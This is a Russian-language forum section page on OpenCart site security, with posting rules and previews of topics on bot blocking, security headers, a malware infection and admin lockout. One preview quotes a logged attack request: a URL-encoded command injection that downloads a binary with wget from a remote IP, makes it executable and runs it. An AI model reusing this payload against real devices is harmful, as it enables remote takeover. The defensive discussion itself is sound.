Вопросы по Безопасности OpenCart
Вопросы обеспечения безопасности сайтов и всё, что с этим связано
Правила раздела
Общайтесь с людьми на форуме так, как вы разговаривали бы с ними в реальной жизни. В повседневном общении мы демонстрируем воспитанность, степенность и солидность. Берите пример с самих себя и при виртуальном общении.
Помните, вы находитесь на тематическом форуме, старайтесь руководствоваться нормами поведения, которые приняты в деловой среде. Посылайте простые и ясные сообщения, которые понятны всем участникам диалога. Придерживайтесь тематики топика и задавайте вопросы по делу.
Не бойтесь быть дружелюбным и общительным, пользуйтесь возможностями неформальной обстановки, высказывайтесь доброжелательно и спокойно. Вы можете воздействовать на обстановку и людей, создавая тем самым приятную атмосферу на форуме.
Если вам не нравятся собеседники в теме общения или обстановка, которая в ней сложилась, не стоит писать сообщения, изобличающие людей, которые вас не устраивают. Каждый из вас может просто покинуть топик и исключить неприятности из своей жизни.
Чего следует сторониться:
- не нормативная лексика - табу на подавляющем большинстве форумов и этот не исключение,
- оскорбления - помните, что каждое слово может быть использовано против вас,
- угрозы - а подобные сообщения преследуются по закону!
Руководствуясь этими простыми правилами, вы сможете избежать бессмысленных разногласий и добиться конструктивного общения, а также скорейшего решения вашего вопроса или возникшей проблемы.
В форуме 8 тем
-
- 2 подписчиков
- 1 ответ
- 1,3 тыс просмотра
Всем здравствуйте, после переезда на новые сервера, столкнулся по странными запросами вот такого вида: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) пытаются грузить на сервер shell и получить доступ к сайту, стандартные методы борьбы не особо помогают, менял права на /tmp на 755, 775, но сайт падает на 500, где сайт и /tmp могут быть связаны и как можно купировать эту проблему?
Последний ответ от Rashp, -
- 3 подписчиков
- 5 ответов
- 1,4 тыс просмотров
Всем здравствуйте, Кто-нибудь настраивал защиту от поведенческих ботов? Задолбали боты Biterika LLC, уже многое перепробовал, у меня есть настройка nginx - blackips, но мне кажется это полная шляпа и на работу движка как-то не хорошо влияет. Ставил какой-то г*в#* модуль Messor, тоже полная фигня. Кто-то настраивал блокировку по ASN не через cloudflare (не безопасно это сейчас настраивать). Или есть еще какие нибудь методы борьбы?
Последний ответ от Rashp, -
- 2 подписчиков
- 0 ответов
- 787 просмотров
Здравствуйте, прописал наконец-то заголовки безопасности HTTP Headers в .htaccess на ocStore 2.3, и вроде сервисы показывают, что все правильно, но не покидает чувство, что что-то не так сделано))) веб сервис на связке nginx+Apache ocStore 2.3, может кто подскажет, все ли верно или может что поправить нужно или дописать? # Заголовки безопасности Header always unset X-Powered-By Header unset X-Powered-By <IfModule mod_headers.c> Header always set Strict-Transport-Security "max-age=31536000" env=HTTPS Header always set Content-Security-Policy "upgrade-insecure-requests" Header always set X-Content-Type-Options "nosniff" Header always set X-XSS-Protection "1…
Последний ответ от Niga, -
- 2 подписчиков
- 1 ответ
- 2 тыс просмотров
Добрый день! словил на одном из сайтов на ocstore 2.3 такую вирусню: - затирается главный файл .htaccess и в код главной страницы index.php в начало добавляется вредоносный код; - при попытке изменения .htaccess или index.php, они буквально через секунду снова перезатирались; - во ВСЕХ директориях сайта, который был основным зараженным, создались файлы .htaccess, запрещающие вам доступ чезер браузер к директориям; - создаются файлы в директориях сайта с вредоносным кодом и рандомным названием; - иногда встраивается вредоносный код в файлы; в логах обнаружил вот такое: Apr 16 04:22:07 vh320 apache_access[10209]: WWWSITE.com 194.87.218.48 - - [16/Apr/2023:0…
Последний ответ от halfhope, -
Ребята, подскажите какой лучше поставить Крон скрипт, присылающий на почту изменения времени модификации и появления новых файлов любых php,tpl,js Хочу поставить на сайт, как защиту от взлома сайта.
Последний ответ от Tom, -
- 2 подписчиков
- 1 ответ
- 463 просмотра
Всем привет, подскажите актуальный чек лист для защиты сайта, админки сайта от взлома. Сайт на Opencart
Последний ответ от AlexDW, -
- 5 подписчиков
- 10 ответов
- 2,2 тыс просмотров
Доброго времени суток. Пожалуйста ребят, помогите восстановить доступ в админку магазина, Не могу понять почему не пускает в админку, боюсь как бы нас не взломали.. Помогите пожалуйста! Заранее вам благодарна!
Последний ответ от greendaytoday, -
- 2 подписчиков
- 1 ответ
- 498 просмотров
Собственно вопрос в заголовке.
Последний ответ от Tom,